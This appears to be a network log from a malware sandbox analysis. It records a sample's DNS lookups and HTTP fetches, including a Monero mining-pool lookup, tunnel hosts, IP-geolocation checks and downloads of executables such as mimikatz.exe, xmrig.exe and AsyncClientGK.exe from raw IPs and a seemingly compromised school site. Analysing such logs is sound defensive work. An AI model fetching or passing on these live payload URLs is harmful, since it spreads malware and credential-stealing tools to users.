Date: Mon, 13 Jan 2025 17:32:32 GMT
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Last-Modified: Thu, 05 Oct 2023 00:56:47 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,quic=":443"; ma=2592000; v="46"
Vary: Origin
DNS

r2.sn-5hnednss.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r2.sn-5hnednss.gvt1.com

IN A

Response

r2.sn-5hnednss.gvt1.com

IN A

172.217.132.199
DNS

r2.sn-5hnednss.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r2.sn-5hnednss.gvt1.com

IN A

Response

r2.sn-5hnednss.gvt1.com

IN A

172.217.132.199
DNS

r2.sn-5hnednss.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r2.sn-5hnednss.gvt1.com

IN AAAA

Response

r2.sn-5hnednss.gvt1.com

IN AAAA

2a00:1450:400e:1b::7
DNS

r2.sn-5hnednss.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r2.sn-5hnednss.gvt1.com

IN AAAA

Response

r2.sn-5hnednss.gvt1.com

IN AAAA

2a00:1450:400e:1b::7
DNS

201.181.244.35.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

201.181.244.35.in-addr.arpa

IN PTR

Response

201.181.244.35.in-addr.arpa

IN PTR

20118124435bcgoogleusercontentcom
DNS

14.180.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

14.180.250.142.in-addr.arpa

IN PTR

Response

14.180.250.142.in-addr.arpa

IN PTR

lhr25s32-in-f141e100net
DNS

14.180.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

14.180.250.142.in-addr.arpa

IN PTR

Response

14.180.250.142.in-addr.arpa

IN PTR

lhr25s32-in-f141e100net
DNS

155.134.221.88.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

155.134.221.88.in-addr.arpa

IN PTR

Response

155.134.221.88.in-addr.arpa

IN PTR

a88-221-134-155deploystaticakamaitechnologiescom
DNS

api.ipify.org

gem1.exe

Remote address:

8.8.8.8:53

Request

api.ipify.org

IN A

Response

api.ipify.org

IN A

104.26.13.205

api.ipify.org

IN A

104.26.12.205

api.ipify.org

IN A

172.67.74.152
DNS

api.ipify.org

gem1.exe

Remote address:

8.8.8.8:53

Request

api.ipify.org

IN A

Response

api.ipify.org

IN A

104.26.13.205

api.ipify.org

IN A

104.26.12.205

api.ipify.org

IN A

172.67.74.152
GET

https://api.ipify.org/

gem1.exe

Remote address:

104.26.13.205:443

Request

GET / HTTP/1.1
Accept: text/html; text/plain; */*
Host: api.ipify.org
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 17:41:10 GMT
Content-Type: text/plain
Content-Length: 14
Connection: keep-alive
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 90172cf58ee0cd3c-LHR
server-timing: cfL4;desc="?proto=TCP&rtt=52067&min_rtt=36831&rtt_var=21840&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3274&recv_bytes=402&delivery_rate=89517&cwnd=253&unsent_bytes=0&cid=82a1cc9c4d638183&ts=463&x=0"
DNS

199.132.217.172.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

199.132.217.172.in-addr.arpa

IN PTR

Response

199.132.217.172.in-addr.arpa

IN PTR

ams16s33-in-f71e100net
DNS

199.132.217.172.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

199.132.217.172.in-addr.arpa

IN PTR

Response

199.132.217.172.in-addr.arpa

IN PTR

ams16s33-in-f71e100net
DNS

173.187.63.66.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

173.187.63.66.in-addr.arpa

IN PTR

Response
DNS

173.187.63.66.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

173.187.63.66.in-addr.arpa

IN PTR

Response
DNS

205.13.26.104.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

205.13.26.104.in-addr.arpa

IN PTR

Response
DNS

205.13.26.104.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

205.13.26.104.in-addr.arpa

IN PTR

Response
DNS

c.pki.goog

gem1.exe

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.178.3
DNS

c.pki.goog

gem1.exe

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.178.3
GET

http://c.pki.goog/r/gsr1.crl

gem1.exe

Remote address:

142.250.178.3:80

Request

GET /r/gsr1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 1739
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Mon, 13 Jan 2025 16:57:17 GMT
Expires: Mon, 13 Jan 2025 17:47:17 GMT
Cache-Control: public, max-age=3000
Age: 2633
Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
GET

http://c.pki.goog/r/r4.crl

gem1.exe

Remote address:

142.250.178.3:80

Request

GET /r/r4.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 436
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Mon, 13 Jan 2025 17:08:41 GMT
Expires: Mon, 13 Jan 2025 17:58:41 GMT
Cache-Control: public, max-age=3000
Age: 1949
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
DNS

urlhaus.abuse.ch

._cache_New Text Document mod.exe

Remote address:

8.8.8.8:53

Request

urlhaus.abuse.ch

IN A

Response

urlhaus.abuse.ch

IN CNAME

p2.shared.global.fastly.net

p2.shared.global.fastly.net

IN A

151.101.130.49

p2.shared.global.fastly.net

IN A

151.101.66.49

p2.shared.global.fastly.net

IN A

151.101.194.49

p2.shared.global.fastly.net

IN A

151.101.2.49
GET

https://urlhaus.abuse.ch/downloads/text_online/

._cache_New Text Document mod.exe

Remote address:

151.101.130.49:443

Request

GET /downloads/text_online/ HTTP/1.1
Host: urlhaus.abuse.ch
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 630255
Server: Apache
Strict-Transport-Security: max-age=15768000 ; includeSubDomains
Expect-CT: enforce, max-age=86400
Permissions-Policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), speaker=(), usb=(), vr=()
Referrer-Policy: strict-origin-when-cross-origin
Content-Security-Policy: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443 https://hcaptcha.com https://*.hcaptcha.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443 https://hcaptcha.com https://*.hcaptcha.com; frame-src https://www.google.com/recaptcha/ https://hcaptcha.com https://*.hcaptcha.com; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none';
Cross-Origin-Opener-Policy: same-origin; report-to="default"
Cross-Origin-Resource-Policy: same-site
Last-Modified: Mon, 13 Jan 2025 17:35:38 GMT
ETag: "99def-62b99df6853dc"
Cache-Control: max-age=300
Expires: Mon, 13 Jan 2025 17:41:55 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Content-Type: text/plain
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Mon, 13 Jan 2025 17:41:21 GMT
Age: 266
X-Served-By: cache-fra-eddf8230087-FRA, cache-lcy-eglc8600083-LCY
X-Cache: HIT, HIT
X-Cache-Hits: 314, 2
X-Timer: S1736790081.392741,VS0,VE1
Vary: Accept-Encoding
DNS

49.130.101.151.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

49.130.101.151.in-addr.arpa

IN PTR

Response
DNS

pool.supportxmr.com

Remote address:

8.8.8.8:53

Request

pool.supportxmr.com

IN A

Response

pool.supportxmr.com

IN CNAME

pool-fr.supportxmr.com

pool-fr.supportxmr.com

IN A

141.94.96.195

pool-fr.supportxmr.com

IN A

141.94.96.71

pool-fr.supportxmr.com

IN A

141.94.96.144
DNS

195.96.94.141.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.96.94.141.in-addr.arpa

IN PTR

Response

195.96.94.141.in-addr.arpa

IN PTR

ns31444891ip-141-94-96eu
DNS

195.96.94.141.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.96.94.141.in-addr.arpa

IN PTR

Response

195.96.94.141.in-addr.arpa

IN PTR

ns31444891ip-141-94-96eu
DNS

docs.google.com

Remote address:

8.8.8.8:53

Request

docs.google.com

IN A

Response

docs.google.com

IN A

142.250.179.238
DNS

docs.google.com

Remote address:

8.8.8.8:53

Request

docs.google.com

IN A

Response

docs.google.com

IN A

142.250.179.238
DNS

o.pki.goog

Remote address:

8.8.8.8:53

Request

o.pki.goog

IN A

Response

o.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.178.3
DNS

o.pki.goog

Remote address:

8.8.8.8:53

Request

o.pki.goog

IN A

Response

o.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.178.3
GET

http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDREXAZkIcRFgn9FoWvtnQ0

Remote address:

142.250.178.3:80

Request

GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDREXAZkIcRFgn9FoWvtnQ0 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: o.pki.goog

Response

HTTP/1.1 200 OK

Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Mon, 13 Jan 2025 17:15:57 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 1530
GET

http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCtrC6LRgin8QlSmIIYAEvj

Remote address:

142.250.178.3:80

Request

GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCtrC6LRgin8QlSmIIYAEvj HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: o.pki.goog

Response

HTTP/1.1 200 OK

Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Mon, 13 Jan 2025 17:29:27 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 720
DNS

drive.usercontent.google.com

Remote address:

8.8.8.8:53

Request

drive.usercontent.google.com

IN A

Response

drive.usercontent.google.com

IN A

216.58.212.193
DNS

drive.usercontent.google.com

Remote address:

8.8.8.8:53

Request

drive.usercontent.google.com

IN A

Response

drive.usercontent.google.com

IN A

216.58.212.193
DNS

193.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

193.212.58.216.in-addr.arpa

IN PTR

Response

193.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f11e100net

193.212.58.216.in-addr.arpa

IN PTR

ams16s21-in-f193�H

193.212.58.216.in-addr.arpa

IN PTR

lhr25s27-in-f1�H
DNS

43.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.229.111.52.in-addr.arpa

IN PTR

Response
DNS

docs.google.com

Remote address:

8.8.8.8:53

Request

docs.google.com

IN A

Response

docs.google.com

IN A

142.250.179.238
DNS

docs.google.com

Remote address:

8.8.8.8:53

Request

docs.google.com

IN A

Response

docs.google.com

IN A

142.250.179.238
DNS

docs.google.com

Remote address:

8.8.8.8:53

Request

docs.google.com

IN AAAA

Response

docs.google.com

IN AAAA

2a00:1450:4009:81d::200e
DNS

docs.google.com

Remote address:

8.8.8.8:53

Request

docs.google.com

IN AAAA

Response

docs.google.com

IN AAAA

2a00:1450:4009:81d::200e
DNS

urlhaus.abuse.ch

._cache_New Text Document mod.exe

Remote address:

8.8.8.8:53

Request

urlhaus.abuse.ch

IN A

Response

urlhaus.abuse.ch

IN CNAME

p2.shared.global.fastly.net

p2.shared.global.fastly.net

IN A

151.101.130.49

p2.shared.global.fastly.net

IN A

151.101.66.49

p2.shared.global.fastly.net

IN A

151.101.194.49

p2.shared.global.fastly.net

IN A

151.101.2.49
GET

http://154.213.192.42/cbot.exe

Remote address:

154.213.192.42:80

Request

GET /cbot.exe HTTP/1.1
Host: 154.213.192.42
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 17:43:11 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Mon, 13 Jan 2025 13:07:32 GMT
ETag: "6000-62b96209703b2"
Accept-Ranges: bytes
Content-Length: 24576
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

42.192.213.154.in-addr.arpa

Remote address:

8.8.8.8:53

Request

42.192.213.154.in-addr.arpa

IN PTR

Response
GET

http://151.106.34.115:6573/svhost.exe

Remote address:

151.106.34.115:6573

Request

GET /svhost.exe HTTP/1.1
Host: 151.106.34.115:6573
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 17:43:13 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.2.20
Last-Modified: Fri, 25 Oct 2024 04:38:04 GMT
ETag: "6af800-62545af488300"
Accept-Ranges: bytes
Content-Length: 7010304
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
DNS

115.34.106.151.in-addr.arpa

Remote address:

8.8.8.8:53

Request

115.34.106.151.in-addr.arpa

IN PTR

Response

115.34.106.151.in-addr.arpa

IN PTR

ns3158781 ip-151-106-34eu
DNS

115.34.106.151.in-addr.arpa

Remote address:

8.8.8.8:53

Request

115.34.106.151.in-addr.arpa

IN PTR

Response

115.34.106.151.in-addr.arpa

IN PTR

ns3158781 ip-151-106-34eu
DNS

urlhaus.abuse.ch

._cache_New Text Document mod.exe

Remote address:

8.8.8.8:53

Request

urlhaus.abuse.ch

IN A

Response

urlhaus.abuse.ch

IN CNAME

p2.shared.global.fastly.net

p2.shared.global.fastly.net

IN A

151.101.2.49

p2.shared.global.fastly.net

IN A

151.101.130.49

p2.shared.global.fastly.net

IN A

151.101.194.49

p2.shared.global.fastly.net

IN A

151.101.66.49
GET

http://87.121.86.2:8080/mimikatz.exe

Remote address:

87.121.86.2:8080

Request

GET /mimikatz.exe HTTP/1.1
Host: 87.121.86.2:8080
Connection: Keep-Alive

Response

HTTP/1.0 200 OK

Server: SimpleHTTP/0.6 Python/3.8.10
Date: Mon, 13 Jan 2025 17:43:14 GMT
Content-type: application/x-msdos-program
Content-Length: 1355264
Last-Modified: Mon, 19 Sep 2022 15:44:39 GMT
GET

http://47.90.142.15:2333/123.exe

Remote address:

47.90.142.15:2333

Request

GET /123.exe HTTP/1.1
Host: 47.90.142.15:2333
Connection: Keep-Alive

Response

HTTP/1.0 200 OK

Server: SimpleHTTP/0.6 Python/3.10.12
Date: Mon, 13 Jan 2025 17:43:15 GMT
Content-type: application/x-msdos-program
Content-Length: 73802
Last-Modified: Sun, 15 Dec 2024 16:33:11 GMT
GET

http://82.58.168.32/xmrig.exe

Remote address:

82.58.168.32:80

Request

GET /xmrig.exe HTTP/1.1
Host: 82.58.168.32
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 17:43:16 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Last-Modified: Thu, 28 Nov 2024 06:11:00 GMT
ETag: "90ee00-627f2f2482eed"
Accept-Ranges: bytes
Content-Length: 9498112
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
DNS

49.2.101.151.in-addr.arpa

Remote address:

8.8.8.8:53

Request

49.2.101.151.in-addr.arpa

IN PTR

Response
DNS

2.86.121.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.86.121.87.in-addr.arpa

IN PTR

Response
DNS

2.86.121.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.86.121.87.in-addr.arpa

IN PTR

Response
DNS

15.142.90.47.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.142.90.47.in-addr.arpa

IN PTR

Response
DNS

15.142.90.47.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.142.90.47.in-addr.arpa

IN PTR

Response
DNS

32.168.58.82.in-addr.arpa

Remote address:

8.8.8.8:53

Request

32.168.58.82.in-addr.arpa

IN PTR

Response

32.168.58.82.in-addr.arpa

IN PTR

host-82-58-168-32retail telecomitaliait
DNS

32.168.58.82.in-addr.arpa

Remote address:

8.8.8.8:53

Request

32.168.58.82.in-addr.arpa

IN PTR

Response

32.168.58.82.in-addr.arpa

IN PTR

host-82-58-168-32retail telecomitaliait
GET

http://23.27.51.244/chrtrome22.exe

Remote address:

23.27.51.244:80

Request

GET /chrtrome22.exe HTTP/1.1
Host: 23.27.51.244
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 17:43:16 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 05 Jan 2025 18:06:51 GMT
ETag: "3400-62af96050fbc7"
Accept-Ranges: bytes
Content-Length: 13312
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

244.51.27.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

244.51.27.23.in-addr.arpa

IN PTR

Response
DNS

244.51.27.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

244.51.27.23.in-addr.arpa

IN PTR

Response
DNS

0.tcp.in.ngrok.io

Remote address:

8.8.8.8:53

Request

0.tcp.in.ngrok.io

IN A

Response

0.tcp.in.ngrok.io

IN A

13.202.226.61
DNS

0.tcp.in.ngrok.io

Remote address:

8.8.8.8:53

Request

0.tcp.in.ngrok.io

IN A

Response

0.tcp.in.ngrok.io

IN A

3.108.97.190
DNS

github.com

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
DNS

github.com

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
GET

http://github.com/thomson101/XHP/releases/download/Release/Steanings.exe

Remote address:

20.26.156.215:80

Request

GET /thomson101/XHP/releases/download/Release/Steanings.exe HTTP/1.1
Host: github.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Content-Length: 0
Location: https://github.com/thomson101/XHP/releases/download/Release/Steanings.exe
GET

http://github.com/legendary6911331/zakaz8/releases/download/safasf/AsyncClientGK.exe

Remote address:

20.26.156.215:80

Request

GET /legendary6911331/zakaz8/releases/download/safasf/AsyncClientGK.exe HTTP/1.1
Host: github.com

Response

HTTP/1.1 301 Moved Permanently

Content-Length: 0
Location: https://github.com/legendary6911331/zakaz8/releases/download/safasf/AsyncClientGK.exe
DNS

objects.githubusercontent.com

Remote address:

8.8.8.8:53

Request

objects.githubusercontent.com

IN A

Response

objects.githubusercontent.com

IN A

185.199.111.133

objects.githubusercontent.com

IN A

185.199.109.133

objects.githubusercontent.com

IN A

185.199.110.133

objects.githubusercontent.com

IN A

185.199.108.133
DNS

objects.githubusercontent.com

Remote address:

8.8.8.8:53

Request

objects.githubusercontent.com

IN A

Response

objects.githubusercontent.com

IN A

185.199.108.133

objects.githubusercontent.com

IN A

185.199.111.133

objects.githubusercontent.com

IN A

185.199.110.133

objects.githubusercontent.com

IN A

185.199.109.133
DNS

215.156.26.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

215.156.26.20.in-addr.arpa

IN PTR

Response
DNS

ip-api.com

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
DNS

ip-api.com

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/json/

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 17:43:20 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 291
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

evilbit.pro

Remote address:

8.8.8.8:53

Request

evilbit.pro

IN A

Response

evilbit.pro

IN A

104.21.95.99

evilbit.pro

IN A

172.67.144.26
DNS

evilbit.pro

Remote address:

8.8.8.8:53

Request

evilbit.pro

IN A

Response

evilbit.pro

IN A

172.67.144.26

evilbit.pro

IN A

104.21.95.99
DNS

upload.vina-host.com

Remote address:

8.8.8.8:53

Request

upload.vina-host.com

IN A

Response

upload.vina-host.com

IN A

125.212.220.95
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

77.41.56.212.in-addr.arpa

Remote address:

8.8.8.8:53

Request

77.41.56.212.in-addr.arpa

IN PTR

Response

77.41.56.212.in-addr.arpa

IN PTR

vmi2374020 contaboservernet
DNS

77.41.56.212.in-addr.arpa

Remote address:

8.8.8.8:53

Request

77.41.56.212.in-addr.arpa

IN PTR

Response

77.41.56.212.in-addr.arpa

IN PTR

vmi2374020 contaboservernet
DNS

99.95.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.95.21.104.in-addr.arpa

IN PTR

Response
DNS

99.95.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.95.21.104.in-addr.arpa

IN PTR

Response
DNS

test.aionclassic.pro

Remote address:

8.8.8.8:53

Request

test.aionclassic.pro

IN A

Response

test.aionclassic.pro

IN A

80.72.24.103
DNS

test.aionclassic.pro

Remote address:

8.8.8.8:53

Request

test.aionclassic.pro

IN A

Response

test.aionclassic.pro

IN A

80.72.24.103
DNS

95.220.212.125.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.220.212.125.in-addr.arpa

IN PTR

Response

95.220.212.125.in-addr.arpa

IN CNAME

95.0-24.220.212.125.in-addr.arpa
DNS

95.220.212.125.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.220.212.125.in-addr.arpa

IN PTR
DNS

95.220.212.125.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.220.212.125.in-addr.arpa

IN PTR
GET

http://45.125.67.168/stelin/Crawl.exe

Remote address:

45.125.67.168:80

Request

GET /stelin/Crawl.exe HTTP/1.1
Host: 45.125.67.168
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Mon, 13 Jan 2025 17:43:24 GMT
Content-Type: application/octet-stream
Content-Length: 892416
Last-Modified: Tue, 07 Jan 2025 07:22:06 GMT
Connection: keep-alive
ETag: "677cd61e-d9e00"
Accept-Ranges: bytes
DNS

168.67.125.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

168.67.125.45.in-addr.arpa

IN PTR

Response

168.67.125.45.in-addr.arpa

IN PTR

slot1ge-recom
DNS

qrpn9be.localto.net

Remote address:

8.8.8.8:53

Request

qrpn9be.localto.net

IN A

Response

qrpn9be.localto.net

IN A

185.141.35.21
DNS

qrpn9be.localto.net

Remote address:

8.8.8.8:53

Request

qrpn9be.localto.net

IN A

Response

qrpn9be.localto.net

IN A

185.141.35.21
GET

http://ip-api.com/json/

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 17:43:26 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 291
Access-Control-Allow-Origin: *
X-Ttl: 54
X-Rl: 43
GET

http://github.com/TOP-executors/JJsploit/raw/refs/heads/main/JJSPLOIT.V2.exe

Remote address:

20.26.156.215:80

Request

GET /TOP-executors/JJsploit/raw/refs/heads/main/JJSPLOIT.V2.exe HTTP/1.1
Host: github.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Content-Length: 0
Location: https://github.com/TOP-executors/JJsploit/raw/refs/heads/main/JJSPLOIT.V2.exe
GET

http://147.124.216.113/albt.exe

Remote address:

147.124.216.113:80

Request

GET /albt.exe HTTP/1.1
Host: 147.124.216.113
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Last-Modified: Mon, 13 Jan 2025 01:10:58 GMT
Accept-Ranges: bytes
ETag: "9ca0aa05865db1:0"
Server: Microsoft-IIS/8.5
Date: Mon, 13 Jan 2025 17:43:27 GMT
Content-Length: 1443328
DNS

www.kasihcommunityschool.sch.id

Remote address:

8.8.8.8:53

Request

www.kasihcommunityschool.sch.id

IN A

Response

www.kasihcommunityschool.sch.id

IN CNAME

kasihcommunityschool.sch.id

kasihcommunityschool.sch.id

IN A

66.63.187.250
DNS

www.kasihcommunityschool.sch.id

Remote address:

8.8.8.8:53

Request

www.kasihcommunityschool.sch.id

IN A

Response

www.kasihcommunityschool.sch.id

IN CNAME

kasihcommunityschool.sch.id

kasihcommunityschool.sch.id

IN A

66.63.187.250
GET

http://www.kasihcommunityschool.sch.id/mk/drop2.exe

Remote address:

66.63.187.250:80

Request

GET /mk/drop2.exe HTTP/1.1
Host: www.kasihcommunityschool.sch.id
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 17:43:29 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sat, 11 Jan 2025 15:37:58 GMT
ETag: "83800-62b6ffee44180"
Accept-Ranges: bytes
Content-Length: 538624
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
DNS

113.216.124.147.in-addr.arpa

Remote address:

8.8.8.8:53

Request

113.216.124.147.in-addr.arpa

IN PTR

Response
DNS

113.216.124.147.in-addr.arpa

Remote address:

8.8.8.8:53

Request

113.216.124.147.in-addr.arpa

IN PTR

Response
DNS

webmail.kasihcommunityschool.sch.id

Remote address:

8.8.8.8:53

Request

webmail.kasihcommunityschool.sch.id

IN A

Response

webmail.kasihcommunityschool.sch.id

IN A

66.63.187.250
DNS

webmail.kasihcommunityschool.sch.id

Remote address:

8.8.8.8:53

Request

webmail.kasihcommunityschool.sch.id

IN A

Response

webmail.kasihcommunityschool.sch.id

IN A

66.63.187.250
GET

http://82.140.14.10:8080/01.exe

Remote address:

82.140.14.10:8080

Request

GET /01.exe HTTP/1.1
Host: 82.140.14.10:8080
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Content-Length: 192585
Accept-Ranges: bytes
Server: HFS 2.3c
Set-Cookie: HFS_SID=0.798165490850806; path=/;
Last-Modified: Thu, 20 Jul 2017 08:58:17 GMT
Content-Disposition: attachment; filename="01.exe";
GET

http://82.140.14.10:8080/00.exe

Remote address:

82.140.14.10:8080

Request

GET /00.exe HTTP/1.1
Host: 82.140.14.10:8080

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Content-Length: 432640
Accept-Ranges: bytes
Server: HFS 2.3c
Set-Cookie: HFS_SID=0.0095917652361095; path=/;
Last-Modified: Thu, 20 Jul 2017 08:58:06 GMT
Content-Disposition: attachment; filename="00.exe";
GET

http://82.140.14.10:8080/02.exe

Remote address:

82.140.14.10:8080

Request

GET /02.exe HTTP/1.1
Host: 82.140.14.10:8080

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Content-Length: 58368
Accept-Ranges: bytes
